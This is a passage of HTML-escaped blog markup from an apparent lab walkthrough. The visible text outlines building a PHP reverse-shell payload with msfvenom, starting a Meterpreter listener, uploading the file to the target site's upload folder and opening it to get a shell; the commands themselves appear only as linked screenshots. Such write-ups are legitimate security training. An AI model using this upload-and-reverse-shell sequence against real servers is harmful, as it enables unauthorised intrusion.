src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNk-ZFCkB2C85xUI-uRF3MLaVqpeqYzUofy9pbWNDZQDBlWFthxIDkzHsKrnS5GCNELhno3WmAGRpy0k1AQZL_QduvpH9vXTSG4d5l2oLThWPH0TaygiboMihrlseOi6v_vrjHBEE35U4TSWEGSLnE-lRhQcTzDjv4Ms_9H6KfhBMb0FRVF_Ki5RQ8Bw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Also, we can explore directories content with &quot;pwd&quot; and &quot;ls&quot;, discovering &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;sarDATA, sarFILE&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt; and &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;uPLOAD&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi0HDErkqllmM85Ui_0TYkSKMbFsTnXgfN7OFyqFSJDSf8o7sHQDfRgqPBzaeBMaa-Kvmyn541fyo6V8Bss6gC6IbGjhLMmDpd1JSUUHXCFQ1bIz8-3-mYEbyH0HGgUexvcC2fTPl4AqZ7hhCXMzfLgwnh4OtUbxJuZoS7hH9R4a7GWYS5NZaWYgn71pQ=s613&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;326&quot; data-original-width=&quot;613&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi0HDErkqllmM85Ui_0TYkSKMbFsTnXgfN7OFyqFSJDSf8o7sHQDfRgqPBzaeBMaa-Kvmyn541fyo6V8Bss6gC6IbGjhLMmDpd1JSUUHXCFQ1bIz8-3-mYEbyH0HGgUexvcC2fTPl4AqZ7hhCXMzfLgwnh4OtUbxJuZoS7hH9R4a7GWYS5NZaWYgn71pQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikp13B0JVeg5t-0d2vIZSnsmYUO7wOEaYqhOXm5v1sUJ_isx9wkf7b9AjFz6s7i6DeFwnS5vivMfpGVxG_rdJRcynS8EsgmvLXXuif9f2SDGQJvhxFyLZj-vAqR_qz8cr-SpW_4UHKEoIRmN2TT512-Z7ZhyzOukcrZ-A4ABw__Zuxind4B8jppu4vDg=s627&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;533&quot; data-original-width=&quot;627&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikp13B0JVeg5t-0d2vIZSnsmYUO7wOEaYqhOXm5v1sUJ_isx9wkf7b9AjFz6s7i6DeFwnS5vivMfpGVxG_rdJRcynS8EsgmvLXXuif9f2SDGQJvhxFyLZj-vAqR_qz8cr-SpW_4UHKEoIRmN2TT512-Z7ZhyzOukcrZ-A4ABw__Zuxind4B8jppu4vDg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgOls0WXj474RWo5_P-L0YfD6agR_w0QoJxmva83G7WputjySOeE4QzIgxt6zdpC2QDw17XuQY27q1GVE3hjjMbFoa7ichPwCMf10irLRXscSF5X_3h9bhu-e79YhowjKmG0vBwBv9rGF0dZyabheByoeYPa1VTvNsjoD2xjkY5HNDemykz44hB66-Ksg=s668&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;491&quot; data-original-width=&quot;668&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgOls0WXj474RWo5_P-L0YfD6agR_w0QoJxmva83G7WputjySOeE4QzIgxt6zdpC2QDw17XuQY27q1GVE3hjjMbFoa7ichPwCMf10irLRXscSF5X_3h9bhu-e79YhowjKmG0vBwBv9rGF0dZyabheByoeYPa1VTvNsjoD2xjkY5HNDemykz44hB66-Ksg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;342&quot; data-original-width=&quot;846&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgHyd7UoM3hO8p0N16gnpvANtMXVhIADBrlh1OyAF38BIJVqyjCjLuEWe5qTCHVxAyutv_2-txErzO_NU9t9RBF81oEgV6OMjL2kaadZShA3fmJP-F4hBRNUJex-idZy3Wujhse6HBqKbjqDa8G2KdDsiwg6KnwI23uckpTZqWzta6-YinvF7FBs1Gwlw=s16000&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Now, using Msfvenom let&#39;s create a PHP reverse exploit called &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;sar1.php:&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjnZqFp5qQ95syYmdT3COg5B4AWrKtEiPpUB4RnSIOTCk735NvLXb3_B95R4Hj9c_aJs1d4IGDHjDaJEtL0TtreQnZxGoP8aJhTi6NnOH5jBKngCTCvhQifiFII74D4pjxJqDMakfEBqSn71kVj663Cuatz59YFJ5zGxQLBnVhrAR7mDGmIQvVLpxsu7A=s984&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;229&quot; data-original-width=&quot;984&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjnZqFp5qQ95syYmdT3COg5B4AWrKtEiPpUB4RnSIOTCk735NvLXb3_B95R4Hj9c_aJs1d4IGDHjDaJEtL0TtreQnZxGoP8aJhTi6NnOH5jBKngCTCvhQifiFII74D4pjxJqDMakfEBqSn71kVj663Cuatz59YFJ5zGxQLBnVhrAR7mDGmIQvVLpxsu7A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Starting the corresponding Meterpreter listening session:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEij7ou1IyE5jAN6g27FIazUaEWWI9JWFo_cUxQzQyW0J_5MAH2cd3jySMdz8E6lSAhZUKT2OKESU8VMGkXPjyVmtl187xZC0LCe8r5yr39I6yc2UHJEzeo3DVBXQc1ent0e3VkoZcqBILIZX4FtikoB2jdiZjBrOnVTkAgrmHT8c3xOm_x9bK3R9oNRGg=s778&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;262&quot; data-original-width=&quot;778&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEij7ou1IyE5jAN6g27FIazUaEWWI9JWFo_cUxQzQyW0J_5MAH2cd3jySMdz8E6lSAhZUKT2OKESU8VMGkXPjyVmtl187xZC0LCe8r5yr39I6yc2UHJEzeo3DVBXQc1ent0e3VkoZcqBILIZX4FtikoB2jdiZjBrOnVTkAgrmHT8c3xOm_x9bK3R9oNRGg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Uploading &lt;b&gt;sar1.php&lt;/b&gt; to the website:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZ5sgRNY4K27IPFS5iz3N_3W8l7luOV8fGWH8c0k80u-GcaIcaeilOyeRMtjiWr0lEghoEyrQHXHgH7c_Rlu2JBoIcEN6CBVA8QdQpAzgqhKREmFx69mStjYmMyaxCzXqEGHmgdxPBNdFKMLfNPSxZtymf2yVcgBzYQunE2IYslDD-VXwRY7mAaINblA=s639&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;321&quot; data-original-width=&quot;639&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZ5sgRNY4K27IPFS5iz3N_3W8l7luOV8fGWH8c0k80u-GcaIcaeilOyeRMtjiWr0lEghoEyrQHXHgH7c_Rlu2JBoIcEN6CBVA8QdQpAzgqhKREmFx69mStjYmMyaxCzXqEGHmgdxPBNdFKMLfNPSxZtymf2yVcgBzYQunE2IYslDD-VXwRY7mAaINblA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhATHFhwyDwSUpnnVt0GhF-cUpwuKWaZOPDK8bDr8OcNIZRzmHFBQ7HZdQX6cSGFPHndzwGrmG52fPkI1VHE_4z-qE4abpmM2DTHMdXvnDMgjeOkCDeW3Sj_u0-8radXLxH0JuI0FamqcnT4nubioXv5soHxo5V1fOz6rCJd6DVxgAafAVveZ3-dmUmhA=s468&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;161&quot; data-original-width=&quot;468&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhATHFhwyDwSUpnnVt0GhF-cUpwuKWaZOPDK8bDr8OcNIZRzmHFBQ7HZdQX6cSGFPHndzwGrmG52fPkI1VHE_4z-qE4abpmM2DTHMdXvnDMgjeOkCDeW3Sj_u0-8radXLxH0JuI0FamqcnT4nubioXv5soHxo5V1fOz6rCJd6DVxgAafAVveZ3-dmUmhA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The upload is successful and the exploit &lt;b&gt;sar1.php&lt;/b&gt; is now at folder &lt;b&gt;/uPLOAD&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj5HsjSbmYPpLOmURlVy-dvoBmkvF5djhTMPB4cT-M6Ptqvc75qIJEFfUH59GBDcv_xgth-ig63kPDE3D7ghBNsRDl3aP1VFfq7CgDvCD8_EWaRuUL6D9hwW5L2ecm3quAQGMxaaQB1goNTs8OtBZ9COC__yRjfP6Wot8HYxyx3RLa-UDWFdPFPPEelfg=s348&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;126&quot; data-original-width=&quot;348&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj5HsjSbmYPpLOmURlVy-dvoBmkvF5djhTMPB4cT-M6Ptqvc75qIJEFfUH59GBDcv_xgth-ig63kPDE3D7ghBNsRDl3aP1VFfq7CgDvCD8_EWaRuUL6D9hwW5L2ecm3quAQGMxaaQB1goNTs8OtBZ9COC__yRjfP6Wot8HYxyx3RLa-UDWFdPFPPEelfg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhmD1BML-dgErusoT2RwsSy4ZzikIIXOHT9bxgji5eMZBNMV0NsFJoYRBPdKxd8SLd1VUkm5n-ny1e5HHu6xpHzZ9tWonFqcJnV3XrvwC6TpRNfbXrpd-UqzQC7TOTUdlAW-hjdf4e32-eQCbwnGDLs8_yw96PLi3sSZnw0BMXJ0orJpy8rBPAMp234GA=s848&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;416&quot; data-original-width=&quot;848&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhmD1BML-dgErusoT2RwsSy4ZzikIIXOHT9bxgji5eMZBNMV0NsFJoYRBPdKxd8SLd1VUkm5n-ny1e5HHu6xpHzZ9tWonFqcJnV3XrvwC6TpRNfbXrpd-UqzQC7TOTUdlAW-hjdf4e32-eQCbwnGDLs8_yw96PLi3sSZnw0BMXJ0orJpy8rBPAMp234GA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running the exploit (just clicking &lt;b&gt;sar1.php&lt;/b&gt;)&amp;nbsp;a Meterpreter session is opened:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEinSaqAYLsw4-uI-na1SL9wFRo1HqVLSmnEw7-sbERHF_aJ5h1isYgO0ttbvODMRoqguAWCtFSKN28gUaIGG3waM0LtKAlwdLqIak42svLNqgo5l22X7r3DPckGBfU9MmQZ4i1myol5a167ysrWIZC5HyDAxB_ZAu6OZqHV6uZgg4bo36eAoksLjeEM5Q=s819&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;170&quot; data-original-width=&quot;819&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEinSaqAYLsw4-uI-na1SL9wFRo1HqVLSmnEw7-sbERHF_aJ5h1isYgO0ttbvODMRoqguAWCtFSKN28gUaIGG3waM0LtKAlwdLqIak42svLNqgo5l22X7r3DPckGBfU9MmQZ4i1myol5a167ysrWIZC5HyDAxB_ZAu6OZqHV6uZgg4bo36eAoksLjeEM5Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting a shell:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: 